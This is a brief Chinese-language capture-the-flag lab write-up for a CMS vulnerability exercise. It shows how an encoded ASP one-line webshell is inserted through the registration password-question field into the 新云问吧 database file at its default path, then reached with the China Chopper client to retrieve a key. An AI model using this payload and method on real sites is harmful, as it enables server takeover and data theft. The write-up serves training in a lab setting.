CMS系统漏洞分析溯源(第3题) 难易程度:★★★ 题目类型:CMS漏洞 使用工具:FireFox浏览器、菜刀 1.打开靶场,跟住题目的解题思路提示在用户注册的密码问题能将一句话木马插入到数据库当中。 然后把前面的信息填好。 在密码问题中填入:┼攠數畣整爠煥敵瑳∨≡┩愾 这是由<% execute request(“a”)%>经过Unicode加密的,加密方式是: ANSI→Unicode。 注册成功! 2.注册完成后,确定好数据库的路径。 新云问吧的数据库默认路径为:/data/ask_newasp.asa。 直接使用菜刀连接。 3.就能在C盘的根目录下找到key。